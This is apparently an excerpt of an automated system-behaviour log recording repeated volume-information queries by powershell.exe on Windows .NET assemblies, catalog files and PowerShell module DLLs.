Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
